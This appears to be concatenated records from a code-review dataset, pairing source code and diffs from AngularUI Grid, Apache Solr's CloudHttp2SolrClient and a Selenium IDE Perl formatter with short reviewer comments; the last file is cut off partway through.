uiGridTreeBaseConstants.EXPANDED ){ row.treeNode.state = uiGridTreeBaseConstants.EXPANDED; grid.api.treeBase.raise.rowExpanded(row); grid.treeBase.expandAll = service.allExpanded(grid.treeBase.tree); grid.queueGridRefresh(); } } }, /** * @ngdoc function * @name expandRowChildren * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Expands this specific row, showing all children. * * @param {Grid} grid grid object * @param {GridRow} row the row we want to expand */ expandRowChildren: function ( grid, row ){ if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } service.setAllNodes(grid, row.treeNode, uiGridTreeBaseConstants.EXPANDED); grid.treeBase.expandAll = service.allExpanded(grid.treeBase.tree); grid.queueGridRefresh(); }, /** * @ngdoc function * @name collapseRow * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Collapses this specific row * * @param {Grid} grid grid object * @param {GridRow} row the row we want to collapse */ collapseRow: function( grid, row ){ if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } if ( row.treeNode.state !== uiGridTreeBaseConstants.COLLAPSED ){ row.treeNode.state = uiGridTreeBaseConstants.COLLAPSED; grid.treeBase.expandAll = false; grid.api.treeBase.raise.rowCollapsed(row); grid.queueGridRefresh(); } }, /** * @ngdoc function * @name collapseRowChildren * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Collapses this specific row and all children * * @param {Grid} grid grid object * @param {GridRow} row the row we want to collapse */ collapseRowChildren: function( grid, row ){ if ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ){ return; } service.setAllNodes(grid, row.treeNode, uiGridTreeBaseConstants.COLLAPSED); grid.treeBase.expandAll = false; grid.queueGridRefresh(); }, /** * @ngdoc function * @name allExpanded * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Returns true if all rows are expanded, false * if they're not. Walks the tree to determine this. Used * to set the expandAll state. * * If the node has no children, then return true (it's immaterial * whether it is expanded). If the node has children, then return * false if this node is collapsed, or if any child node is not all expanded * * @param {object} tree the grid to check * @returns {boolean} whether or not the tree is all expanded */ allExpanded: function( tree ){ var allExpanded = true; tree.forEach( function( node ){ if ( !service.allExpandedInternal( node ) ){ allExpanded = false; } }); return allExpanded; }, allExpandedInternal: function( treeNode ){ if ( treeNode.children && treeNode.children.length > 0 ){ if ( treeNode.state === uiGridTreeBaseConstants.COLLAPSED ){ return false; } var allExpanded = true; treeNode.children.forEach( function( node ){ if ( !service.allExpandedInternal( node ) ){ allExpanded = false; } }); return allExpanded; } else { return true; } }, /** * @ngdoc function * @name treeRows * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description The rowProcessor that adds the nodes to the tree, and sets the visible * state of each row based on it's parent state * * Assumes it is always called after the sorting processor, and the grouping processor if there is one. * Performs any tree sorts itself after having built the tree * * Processes all the rows in order, setting the group level based on the $$treeLevel in the associated * entity, and setting the visible state based on the parent's state. * * Calculates the deepest level of tree whilst it goes, and updates that so that the header column can be correctly * sized. * * Aggregates if necessary along the way. * * @param {array} renderableRows the rows we want to process, usually the output from the previous rowProcessor * @returns {array} the updated rows */ treeRows: function( renderableRows ) { var grid = this; if (renderableRows.length === 0) { service.updateRowHeaderWidth( grid ); return renderableRows; } grid.treeBase.tree = service.createTree( grid, renderableRows ); service.updateRowHeaderWidth( grid ); service.sortTree( grid ); service.fixFilter( grid ); return service.renderTree( grid.treeBase.tree ); }, /** * @ngdoc function * @name createOrUpdateRowHeaderWidth * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Calculates the rowHeader width. * * If rowHeader is always present, updates the width. * * If rowHeader is only sometimes present (`treeRowHeaderAlwaysVisible: false`), determines whether there * should be one, then creates or removes it as appropriate, with the created rowHeader having the * right width. * * If there's never a rowHeader then never creates one: `showTreeRowHeader: false` * * @param {Grid} grid the grid we want to set the row header on */ updateRowHeaderWidth: function( grid ){ var rowHeader = grid.getColumn(uiGridTreeBaseConstants.rowHeaderColName); var newWidth = grid.options.treeRowHeaderBaseWidth + grid.options.treeIndent * Math.max(grid.treeBase.numberLevels - 1, 0); if ( rowHeader && newWidth !== rowHeader.width ){ rowHeader.width = newWidth; grid.queueRefresh(); } var newVisibility = true; if ( grid.options.showTreeRowHeader === false ){ newVisibility = false; } if ( grid.options.treeRowHeaderAlwaysVisible === false && grid.treeBase.numberLevels <= 0 ){ newVisibility = false; } if ( rowHeader && rowHeader.visible !== newVisibility ) { rowHeader.visible = newVisibility; rowHeader.colDef.visible = newVisibility; grid.queueGridRefresh(); } }, /** * @ngdoc function * @name renderTree * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Creates an array of rows based on the tree, exporting only * the visible nodes and leaves * * @param {array} nodeList The list of nodes - can be grid.treeBase.tree, or can be node.children when * we're calling recursively * @returns {array} renderable rows */ renderTree: function( nodeList ){ var renderableRows = []; nodeList.forEach( function ( node ){ if ( node.row.visible ){ renderableRows.push( node.row ); } if ( node.state === uiGridTreeBaseConstants.EXPANDED && node.children && node.children.length > 0 ){ renderableRows = renderableRows.concat( service.renderTree( node.children ) ); } }); return renderableRows; }, /** * @ngdoc function * @name createTree * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Creates a tree from the renderableRows * * @param {Grid} grid The grid * @param {array} renderableRows The rows we want to create a tree from * @returns {object} The tree we've build */ createTree: function( grid, renderableRows ) { var currentLevel = -1; var parents = []; var currentState; grid.treeBase.tree = []; grid.treeBase.numberLevels = 0; var aggregations = service.getAggregations( grid ); var createNode = function( row ){ if ( typeof(row.entity.$$treeLevel) !== 'undefined' && row.treeLevel !== row.entity.$$treeLevel ){ row.treeLevel = row.entity.$$treeLevel; } if ( row.treeLevel <= currentLevel ){ // pop any levels that aren't parents of this level, formatting the aggregation at the same time while ( row.treeLevel <= currentLevel ){ var lastParent = parents.pop(); service.finaliseAggregations( lastParent ); currentLevel--; } // reset our current state based on the new parent, set to expanded if this is a level 0 node if ( parents.length > 0 ){ currentState = service.setCurrentState(parents); } else { currentState = uiGridTreeBaseConstants.EXPANDED; } } // aggregate if this is a leaf node if ( ( typeof(row.treeLevel) === 'undefined' || row.treeLevel === null || row.treeLevel < 0 ) && row.visible ){ service.aggregate( grid, row, parents ); } // add this node to the tree service.addOrUseNode(grid, row, parents, aggregations); if ( typeof(row.treeLevel) !== 'undefined' && row.treeLevel !== null && row.treeLevel >= 0 ){ parents.push(row); currentLevel++; currentState = service.setCurrentState(parents); } // update the tree number of levels, so we can set header width if we need to if ( grid.treeBase.numberLevels < row.treeLevel + 1){ grid.treeBase.numberLevels = row.treeLevel + 1; } }; renderableRows.forEach( createNode ); // finalise remaining aggregations while ( parents.length > 0 ){ var lastParent = parents.pop(); service.finaliseAggregations( lastParent ); } return grid.treeBase.tree; }, /** * @ngdoc function * @name addOrUseNode * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Creates a tree node for this row. If this row already has a treeNode * recorded against it, preserves the state, but otherwise overwrites the data. * * @param {grid} grid The grid we're operating on * @param {gridRow} row The row we want to set * @param {array} parents An array of the parents this row should have * @param {array} aggregationBase Empty aggregation information * @returns {undefined} Updates the parents array, updates the row to have a treeNode, and updates the * grid.treeBase.tree */ addOrUseNode: function( grid, row, parents, aggregationBase ){ var newAggregations = []; aggregationBase.forEach( function(aggregation){ newAggregations.push(service.buildAggregationObject(aggregation.col)); }); var newNode = { state: uiGridTreeBaseConstants.COLLAPSED, row: row, parentRow: null, aggregations: newAggregations, children: [] }; if ( row.treeNode ){ newNode.state = row.treeNode.state; } if ( parents.length > 0 ){ newNode.parentRow = parents[parents.length - 1]; } row.treeNode = newNode; if ( parents.length === 0 ){ grid.treeBase.tree.push( newNode ); } else { parents[parents.length - 1].treeNode.children.push( newNode ); } }, /** * @ngdoc function * @name setCurrentState * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Looks at the parents array to determine our current state. * If any node in the hierarchy is collapsed, then return collapsed, otherwise return * expanded. * * @param {array} parents An array of the parents this row should have * @returns {string} The state we should be setting to any nodes we see */ setCurrentState: function( parents ){ var currentState = uiGridTreeBaseConstants.EXPANDED; parents.forEach( function(parent){ if ( parent.treeNode.state === uiGridTreeBaseConstants.COLLAPSED ){ currentState = uiGridTreeBaseConstants.COLLAPSED; } }); return currentState; }, /** * @ngdoc function * @name sortTree * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Performs a recursive sort on the tree nodes, sorting the * children of each node and putting them back into the children array. * * Before doing this it turns back on all the sortIgnore - things that were previously * ignored we process now. Since we're sorting within the nodes, presumably anything * that was already sorted is how we derived the nodes, we can keep those sorts too. * * We only sort tree nodes that are expanded - no point in wasting effort sorting collapsed * nodes * * @param {Grid} grid The grid to get the aggregation information from * @returns {array} The aggregation information */ sortTree: function( grid ){ grid.columns.forEach( function( column ) { if ( column.sort && column.sort.ignoreSort ){ delete column.sort.ignoreSort; } }); grid.treeBase.tree = service.sortInternal( grid, grid.treeBase.tree ); }, sortInternal: function( grid, treeList ){ var rows = treeList.map( function( node ){ return node.row; }); rows = rowSorter.sort( grid, rows, grid.columns ); var treeNodes = rows.map( function( row ){ return row.treeNode; }); treeNodes.forEach( function( node ){ if ( node.state === uiGridTreeBaseConstants.EXPANDED && node.children && node.children.length > 0 ){ node.children = service.sortInternal( grid, node.children ); } }); return treeNodes; }, /** * @ngdoc function * @name fixFilter * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description After filtering has run, we need to go back through the tree * and make sure the parent rows are always visible if any of the child rows * are visible (filtering may make a child visible, but the parent may not * match the filter criteria) * * This has a risk of being computationally expensive, we do it by walking * the tree and remembering whether there are any invisible nodes on the * way down. * * @param {Grid} grid the grid to fix filters on */ fixFilter: function( grid ){ var parentsVisible; grid.treeBase.tree.forEach( function( node ){ if ( node.children && node.children.length > 0 ){ parentsVisible = node.row.visible; service.fixFilterInternal( node.children, parentsVisible ); } }); }, fixFilterInternal: function( nodes, parentsVisible) { nodes.forEach( function( node ){ if ( node.row.visible && !parentsVisible ){ service.setParentsVisible( node ); parentsVisible = true; } if ( node.children && node.children.length > 0 ){ if ( service.fixFilterInternal( node.children, ( parentsVisible && node.row.visible ) ) ) { parentsVisible = true; } } }); return parentsVisible; }, setParentsVisible: function( node ){ while ( node.parentRow ){ node.parentRow.visible = true; node = node.parentRow.treeNode; } }, /** * @ngdoc function * @name buildAggregationObject * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Build the object which is stored on the column for holding meta-data about the aggregation. * This method should only be called with columns which have an aggregation. * * @param {GridColumn} column The column which this object relates to * @returns {object} {col: GridColumn object, label: string, type: string (optional)} */ buildAggregationObject: function( column ){ var newAggregation = { col: column }; if ( column.treeAggregation && column.treeAggregation.type ){ newAggregation.type = column.treeAggregation.type; } if ( column.treeAggregation && column.treeAggregation.label ){ newAggregation.label = column.treeAggregation.label; } return newAggregation; }, /** * @ngdoc function * @name getAggregations * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Looks through the grid columns to find those with aggregations, * and collates the aggregation information into an array, returns that array * * @param {Grid} grid the grid to get the aggregation information from * @returns {array} the aggregation information */ getAggregations: function( grid ){ var aggregateArray = []; grid.columns.forEach( function(column){ if ( typeof(column.treeAggregationFn) !== 'undefined' ){ aggregateArray.push( service.buildAggregationObject(column) ); if ( grid.options.showColumnFooter && typeof(column.colDef.aggregationType) === 'undefined' && column.treeAggregation ){ // Add aggregation object for footer column.treeFooterAggregation = service.buildAggregationObject(column); column.aggregationType = service.treeFooterAggregationType; } } }); return aggregateArray; }, /** * @ngdoc function * @name aggregate * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Accumulate the data from this row onto the aggregations for each parent * * Iterate over the parents, then iterate over the aggregations for each of those parents, * and perform the aggregation for each individual aggregation * * @param {Grid} grid grid object * @param {GridRow} row the row we want to set grouping visibility on * @param {array} parents the parents that we would want to aggregate onto */ aggregate: function( grid, row, parents ){ if ( parents.length === 0 && row.treeNode && row.treeNode.aggregations ){ row.treeNode.aggregations.forEach(function(aggregation){ // Calculate aggregations for footer even if there are no grouped rows if ( typeof(aggregation.col.treeFooterAggregation) !== 'undefined' ) { var fieldValue = grid.getCellValue(row, aggregation.col); var numValue = Number(fieldValue); aggregation.col.treeAggregationFn(aggregation.col.treeFooterAggregation, fieldValue, numValue, row); } }); } parents.forEach( function( parent, index ){ if ( parent.treeNode.aggregations ){ parent.treeNode.aggregations.forEach( function( aggregation ){ var fieldValue = grid.getCellValue(row, aggregation.col); var numValue = Number(fieldValue); aggregation.col.treeAggregationFn(aggregation, fieldValue, numValue, row); if ( index === 0 && typeof(aggregation.col.treeFooterAggregation) !== 'undefined' ){ aggregation.col.treeAggregationFn(aggregation.col.treeFooterAggregation, fieldValue, numValue, row); } }); } }); }, // Aggregation routines - no doco needed as self evident nativeAggregations: function() { var nativeAggregations = { count: { label: i18nService.get().aggregation.count, menuTitle: i18nService.get().grouping.aggregate_count, aggregationFn: function (aggregation, fieldValue, numValue) { if (typeof(aggregation.value) === 'undefined') { aggregation.value = 1; } else { aggregation.value++; } } }, sum: { label: i18nService.get().aggregation.sum, menuTitle: i18nService.get().grouping.aggregate_sum, aggregationFn: function( aggregation, fieldValue, numValue ) { if (!isNaN(numValue)) { if (typeof(aggregation.value) === 'undefined') { aggregation.value = numValue; } else { aggregation.value += numValue; } } } }, min: { label: i18nService.get().aggregation.min, menuTitle: i18nService.get().grouping.aggregate_min, aggregationFn: function( aggregation, fieldValue, numValue ) { if (typeof(aggregation.value) === 'undefined') { aggregation.value = fieldValue; } else { if (typeof(fieldValue) !== 'undefined' && fieldValue !== null && (fieldValue < aggregation.value || aggregation.value === null)) { aggregation.value = fieldValue; } } } }, max: { label: i18nService.get().aggregation.max, menuTitle: i18nService.get().grouping.aggregate_max, aggregationFn: function( aggregation, fieldValue, numValue ){ if ( typeof(aggregation.value) === 'undefined' ){ aggregation.value = fieldValue; } else { if ( typeof(fieldValue) !== 'undefined' && fieldValue !== null && (fieldValue > aggregation.value || aggregation.value === null)){ aggregation.value = fieldValue; } } } }, avg: { label: i18nService.get().aggregation.avg, menuTitle: i18nService.get().grouping.aggregate_avg, aggregationFn: function( aggregation, fieldValue, numValue ){ if ( typeof(aggregation.count) === 'undefined' ){ aggregation.count = 1; } else { aggregation.count++; } if ( isNaN(numValue) ){ return; } if ( typeof(aggregation.value) === 'undefined' || typeof(aggregation.sum) === 'undefined' ){ aggregation.value = numValue; aggregation.sum = numValue; } else { aggregation.sum += numValue; aggregation.value = aggregation.sum / aggregation.count; } } } }; return nativeAggregations; }, /** * @ngdoc function * @name finaliseAggregation * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Helper function used to finalize aggregation nodes and footer cells * * @param {gridRow} row The parent we're finalising * @param {aggregation} aggregation The aggregation object manipulated by the aggregationFn */ finaliseAggregation: function(row, aggregation){ if ( aggregation.col.treeAggregationUpdateEntity && typeof(row) !== 'undefined' && typeof(row.entity[ '$$' + aggregation.col.uid ]) !== 'undefined' ){ angular.extend( aggregation, row.entity[ '$$' + aggregation.col.uid ]); } if ( typeof(aggregation.col.treeAggregationFinalizerFn) === 'function' ){ aggregation.col.treeAggregationFinalizerFn( aggregation ); } if ( typeof(aggregation.col.customTreeAggregationFinalizerFn) === 'function' ){ aggregation.col.customTreeAggregationFinalizerFn( aggregation ); } if ( typeof(aggregation.rendered) === 'undefined' ){ aggregation.rendered = aggregation.label ? aggregation.label + aggregation.value : aggregation.value; } }, /** * @ngdoc function * @name finaliseAggregations * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Format the data from the aggregation into the rendered text * e.g. if we had label: 'sum: ' and value: 25, we'd create 'sum: 25'. * * As part of this we call any formatting callback routines we've been provided. * * We write our aggregation out to the row.entity if treeAggregationUpdateEntity is * set on the column - we don't overwrite any information that's already there, we append * to it so that grouping can have set the groupVal beforehand without us overwriting it. * * We need to copy the data from the row.entity first before we finalise the aggregation, * we need that information for the finaliserFn * * @param {gridRow} row the parent we're finalising */ finaliseAggregations: function( row ){ if ( row == null || typeof(row.treeNode.aggregations) === 'undefined' ){ return; } row.treeNode.aggregations.forEach( function( aggregation ) { service.finaliseAggregation(row, aggregation); if ( aggregation.col.treeAggregationUpdateEntity ){ var aggregationCopy = {}; angular.forEach( aggregation, function( value, key ){ if ( aggregation.hasOwnProperty(key) && key !== 'col' ){ aggregationCopy[key] = value; } }); row.entity[ '$$' + aggregation.col.uid ] = aggregationCopy; } }); }, /** * @ngdoc function * @name treeFooterAggregationType * @methodOf ui.grid.treeBase.service:uiGridTreeBaseService * @description Uses the tree aggregation functions and finalizers to set the * column footer aggregations. * * @param {rows} rows The visible rows. not used, but accepted to match signature of GridColumn.aggregationType * @param {GridColumn} column The column we are finalizing */ treeFooterAggregationType: function( rows, column ) { service.finaliseAggregation(undefined, column.treeFooterAggregation); if ( typeof(column.treeFooterAggregation.value) === 'undefined' || column.treeFooterAggregation.rendered === null ){ // The was apparently no aggregation performed (perhaps this is a grouped column return ''; } return column.treeFooterAggregation.rendered; } }; return service; }]); /** * @ngdoc directive * @name ui.grid.treeBase.directive:uiGridTreeRowHeaderButtons * @element div * * @description Provides the expand/collapse button on rows */ module.directive('uiGridTreeBaseRowHeaderButtons', ['$templateCache', 'uiGridTreeBaseService', function ($templateCache, uiGridTreeBaseService) { return { replace: true, restrict: 'E', template: $templateCache.get('ui-grid/treeBaseRowHeaderButtons'), scope: true, require: '^uiGrid', link: function($scope, $elm, $attrs, uiGridCtrl) { var self = uiGridCtrl.grid; $scope.treeButtonClick = function(row, evt) { evt.stopPropagation(); uiGridTreeBaseService.toggleRowTreeState(self, row, evt); }; } }; }]); /** * @ngdoc directive * @name ui.grid.treeBase.directive:uiGridTreeBaseExpandAllButtons * @element div * * @description Provides the expand/collapse all button */ module.directive('uiGridTreeBaseExpandAllButtons', ['$templateCache', 'uiGridTreeBaseService', function ($templateCache, uiGridTreeBaseService) { return { replace: true, restrict: 'E', template: $templateCache.get('ui-grid/treeBaseExpandAllButtons'), scope: false, link: function($scope, $elm, $attrs, uiGridCtrl) { var self = $scope.col.grid; $scope.headerButtonClick = function(row, evt) { if ( self.treeBase.expandAll ){ uiGridTreeBaseService.collapseAllRows(self, evt); } else { uiGridTreeBaseService.expandAllRows(self, evt); } }; } }; }]); /** * @ngdoc directive * @name ui.grid.treeBase.directive:uiGridViewport * @element div * * @description Stacks on top of ui.grid.uiGridViewport to set formatting on a tree header row */ module.directive('uiGridViewport', ['$compile', 'uiGridConstants', 'gridUtil', '$parse', function ($compile, uiGridConstants, gridUtil, $parse) { return { priority: -200, // run after default directive scope: false, compile: function ($elm, $attrs) { var rowRepeatDiv = angular.element($elm.children().children()[0]); var existingNgClass = rowRepeatDiv.attr("ng-class"); var newNgClass = ''; if ( existingNgClass ) { newNgClass = existingNgClass.slice(0, -1) + ",'ui-grid-tree-header-row': row.treeLevel > -1}"; } else { newNgClass = "{'ui-grid-tree-header-row': row.treeLevel > -1}"; } rowRepeatDiv.attr("ng-class", newNgClass); return { pre: function ($scope, $elm, $attrs, controllers) { }, post: function ($scope, $elm, $attrs, controllers) { } }; } }; }]); })();
1
11,995
Since I believe state will never be anything other than 'expanded' or collapse, you can rewrite this as follows: `return row.treeNode.state === 'expanded' ? 'ui-grid-icon-minus-squared' : 'ui-grid-icon-plus-squared'; `
angular-ui-ui-grid
js
@@ -32,10 +32,6 @@ import org.apache.solr.common.SolrException; * Solr endpoints for SolrCloud collections, and then use the * {@link LBHttp2SolrClient} to issue requests. * - * This class assumes the id field for your documents is called - * 'id' - if this is not the case, you must set the right name - * with {@link #setIdField(String)}. - * * @lucene.experimental * @since solr 8.0 */
1
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.client.solrj.impl; import java.io.IOException; import java.util.ArrayList; import java.util.Collection; import java.util.List; import java.util.Optional; import org.apache.solr.client.solrj.request.UpdateRequest; import org.apache.solr.common.SolrException; /** * SolrJ client class to communicate with SolrCloud using Http2SolrClient. * Instances of this class communicate with Zookeeper to discover * Solr endpoints for SolrCloud collections, and then use the * {@link LBHttp2SolrClient} to issue requests. * * This class assumes the id field for your documents is called * 'id' - if this is not the case, you must set the right name * with {@link #setIdField(String)}. * * @lucene.experimental * @since solr 8.0 */ @SuppressWarnings("serial") public class CloudHttp2SolrClient extends BaseCloudSolrClient { private final ClusterStateProvider stateProvider; private final LBHttp2SolrClient lbClient; private Http2SolrClient myClient; private final boolean clientIsInternal; /** * Create a new client object that connects to Zookeeper and is always aware * of the SolrCloud state. If there is a fully redundant Zookeeper quorum and * SolrCloud has enough replicas for every shard in a collection, there is no * single point of failure. Updates will be sent to shard leaders by default. * * @param builder a {@link Http2SolrClient.Builder} with the options used to create the client. */ protected CloudHttp2SolrClient(Builder builder) { super(builder.shardLeadersOnly, builder.parallelUpdates, builder.directUpdatesToLeadersOnly); this.clientIsInternal = builder.httpClient == null; this.myClient = (builder.httpClient == null) ? new Http2SolrClient.Builder().build() : builder.httpClient; if (builder.stateProvider == null) { if (builder.zkHosts != null && builder.solrUrls != null) { throw new IllegalArgumentException("Both zkHost(s) & solrUrl(s) have been specified. Only specify one."); } if (builder.zkHosts != null) { this.stateProvider = new ZkClientClusterStateProvider(builder.zkHosts, builder.zkChroot); } else if (builder.solrUrls != null && !builder.solrUrls.isEmpty()) { try { this.stateProvider = new Http2ClusterStateProvider(builder.solrUrls, builder.httpClient); } catch (Exception e) { throw new RuntimeException("Couldn't initialize a HttpClusterStateProvider (is/are the " + "Solr server(s), " + builder.solrUrls + ", down?)", e); } } else { throw new IllegalArgumentException("Both zkHosts and solrUrl cannot be null."); } } else { this.stateProvider = builder.stateProvider; } this.lbClient = new LBHttp2SolrClient(myClient); } @Override public void close() throws IOException { stateProvider.close(); lbClient.close(); if (clientIsInternal && myClient!=null) { myClient.close(); } super.close(); } public LBHttp2SolrClient getLbClient() { return lbClient; } @Override public ClusterStateProvider getClusterStateProvider() { return stateProvider; } public Http2SolrClient getHttpClient() { return myClient; } @Override protected boolean wasCommError(Throwable rootCause) { return false; } /** * Constructs {@link CloudHttp2SolrClient} instances from provided configuration. */ public static class Builder { protected Collection<String> zkHosts = new ArrayList<>(); protected List<String> solrUrls = new ArrayList<>(); protected String zkChroot; protected Http2SolrClient httpClient; protected boolean shardLeadersOnly = true; protected boolean directUpdatesToLeadersOnly = false; protected boolean parallelUpdates = true; protected ClusterStateProvider stateProvider; /** * Provide a series of Solr URLs to be used when configuring {@link CloudHttp2SolrClient} instances. * The solr client will use these urls to understand the cluster topology, which solr nodes are active etc. * * Provided Solr URLs are expected to point to the root Solr path ("http://hostname:8983/solr"); they should not * include any collections, cores, or other path components. * * Usage example: * * <pre> * final List&lt;String&gt; solrBaseUrls = new ArrayList&lt;String&gt;(); * solrBaseUrls.add("http://solr1:8983/solr"); solrBaseUrls.add("http://solr2:8983/solr"); solrBaseUrls.add("http://solr3:8983/solr"); * final SolrClient client = new CloudHttp2SolrClient.Builder(solrBaseUrls).build(); * </pre> */ public Builder(List<String> solrUrls) { this.solrUrls = solrUrls; } /** * Provide a series of ZK hosts which will be used when configuring {@link CloudHttp2SolrClient} instances. * * Usage example when Solr stores data at the ZooKeeper root ('/'): * * <pre> * final List&lt;String&gt; zkServers = new ArrayList&lt;String&gt;(); * zkServers.add("zookeeper1:2181"); zkServers.add("zookeeper2:2181"); zkServers.add("zookeeper3:2181"); * final SolrClient client = new CloudHttp2SolrClient.Builder(zkServers, Optional.empty()).build(); * </pre> * * Usage example when Solr data is stored in a ZooKeeper chroot: * * <pre> * final List&lt;String&gt; zkServers = new ArrayList&lt;String&gt;(); * zkServers.add("zookeeper1:2181"); zkServers.add("zookeeper2:2181"); zkServers.add("zookeeper3:2181"); * final SolrClient client = new CloudHttp2SolrClient.Builder(zkServers, Optional.of("/solr")).build(); * </pre> * * @param zkHosts a List of at least one ZooKeeper host and port (e.g. "zookeeper1:2181") * @param zkChroot the path to the root ZooKeeper node containing Solr data. Provide {@code java.util.Optional.empty()} if no ZK chroot is used. */ public Builder(List<String> zkHosts, Optional<String> zkChroot) { this.zkHosts = zkHosts; if (zkChroot.isPresent()) this.zkChroot = zkChroot.get(); } /** * Tells {@link CloudHttp2SolrClient.Builder} that created clients should send direct updates to shard leaders only. * * UpdateRequests whose leaders cannot be found will "fail fast" on the client side with a {@link SolrException} */ public Builder sendDirectUpdatesToShardLeadersOnly() { directUpdatesToLeadersOnly = true; return this; } /** * Tells {@link CloudHttp2SolrClient.Builder} that created clients can send updates to any shard replica (shard leaders and non-leaders). * * Shard leaders are still preferred, but the created clients will fallback to using other replicas if a leader * cannot be found. */ public Builder sendDirectUpdatesToAnyShardReplica() { directUpdatesToLeadersOnly = false; return this; } /** * Tells {@link CloudHttp2SolrClient.Builder} whether created clients should send shard updates serially or in parallel * * When an {@link UpdateRequest} affects multiple shards, {@link CloudHttp2SolrClient} splits it up and sends a request * to each affected shard. This setting chooses whether those sub-requests are sent serially or in parallel. * <p> * If not set, this defaults to 'true' and sends sub-requests in parallel. */ public Builder withParallelUpdates(boolean parallelUpdates) { this.parallelUpdates = parallelUpdates; return this; } public Builder withHttpClient(Http2SolrClient httpClient) { this.httpClient = httpClient; return this; } /** * Create a {@link CloudHttp2SolrClient} based on the provided configuration. */ public CloudHttp2SolrClient build() { if (stateProvider == null) { if (!zkHosts.isEmpty()) { stateProvider = new ZkClientClusterStateProvider(zkHosts, zkChroot); } else if (!this.solrUrls.isEmpty()) { try { stateProvider = new Http2ClusterStateProvider(solrUrls, httpClient); } catch (Exception e) { throw new RuntimeException("Couldn't initialize a HttpClusterStateProvider (is/are the " + "Solr server(s), " + solrUrls + ", down?)", e); } } else { throw new IllegalArgumentException("Both zkHosts and solrUrl cannot be null."); } } return new CloudHttp2SolrClient(this); } } }
1
40,703
the latter part can go but isn't the first part of this still sound -- that we assume "id"?
apache-lucene-solr
java
@@ -27,14 +27,12 @@ var formatter = this; string = function(value) { if (value != null) { value = value.replace(/\\/g, '\\\\'); - value = value.replace(/\"/g, '\\"'); + value = value.replace(/\'/g, '\\\''); value = value.replace(/\r/g, '\\r'); value = value.replace(/\n/g, '\\n'); - value = value.replace(/@/g, '\\@'); - value = value.replace(/\$/g, '\\$'); - return '"' + value + '"'; + return '\'' + value + '\''; } else { - return '""'; + return '\'\''; } }
1
/* * Format for Selenium Remote Control Perl client. */ var subScriptLoader = Components.classes["@mozilla.org/moz/jssubscript-loader;1"].getService(Components.interfaces.mozIJSSubScriptLoader); subScriptLoader.loadSubScript('chrome://selenium-ide/content/formats/remoteControl.js', this); this.name = "perl-rc"; // method name will not be used in this format function testMethodName(testName) { return testName; } var originalFormatCommands = formatCommands; formatCommands = function(commands) { this.tests = 0; var lines = originalFormatCommands(commands); if (this.tests == 0) { lines += addIndent("pass;\n"); } return lines; } var formatter = this; string = function(value) { if (value != null) { value = value.replace(/\\/g, '\\\\'); value = value.replace(/\"/g, '\\"'); value = value.replace(/\r/g, '\\r'); value = value.replace(/\n/g, '\\n'); value = value.replace(/@/g, '\\@'); value = value.replace(/\$/g, '\\$'); return '"' + value + '"'; } else { return '""'; } } variableName = function(value) { return "$" + value; } concatString = function(array) { return array.join(" . "); } function assertTrue(expression) { if (formatter.assertOrVerifyFailureOnNext) { return expression.toString() + " or die;"; } else { formatter.tests++; if (expression.assertable) { expression.suffix = "_ok"; return expression.toString() + ";"; } else { return "ok(" + expression.toString() + ");"; } } } function assertFalse(expression) { if (formatter.assertOrVerifyFailureOnNext) { return expression.toString() + " and die;"; } else { formatter.tests++; return "ok(not " + expression.toString() + ");"; } } var verifyTrue = assertTrue; var verifyFalse = assertFalse; function joinExpression(expression) { return "join(',', " + expression.toString() + ")"; } function assignToVariable(type, variable, expression) { if (type == 'String[]') { return "my @" + variable + " = " + expression.toString(); } else { return "my $" + variable + " = " + expression.toString(); } } function waitFor(expression) { return "WAIT: {\n" + indents(1) + "for (1..60) {\n" + indents(2) + "if (eval { " + expression.toString() + " }) { pass; last WAIT }\n" + indents(2) + "sleep(1);\n" + indents(1) + "}\n" + indents(1) + 'fail("timeout");\n' + "}"; } function assertOrVerifyFailure(line, isAssert) { return 'dies_ok { ' + line + ' };'; } Equals.prototype.toString = function() { return this.e1.toString() + " eq " + this.e2.toString(); } NotEquals.prototype.toString = function() { return this.e1.toString() + " ne " + this.e2.toString(); } Equals.prototype.assert = function() { if (formatter.assertOrVerifyFailureOnNext) { return assertTrue(this); } else { formatter.tests++; if (!this.e2.args) { return "is(" + this.e1 + ", " + this.e2 + ");"; } else { var expression = this.e2; expression.suffix = "_is"; expression.noGet = true; expression.args.push(this.e1); return expression.toString() + ";"; } } } Equals.prototype.verify = Equals.prototype.assert; NotEquals.prototype.assert = function() { if (formatter.assertOrVerifyFailureOnNext) { return assertTrue(this); } else { if (!this.e2.args) { return "isnt(" + this.e1 + ", " + this.e2 + ");"; } else { formatter.tests++; var expression = this.e2; expression.suffix = "_isnt"; expression.noGet = true; expression.args.push(this.e1); return expression.toString() + ";"; } } } NotEquals.prototype.verify = NotEquals.prototype.assert; RegexpMatch.prototype.toString = function() { return this.expression + " =~ /" + this.pattern.replace(/\//g, "\\/") + "/"; 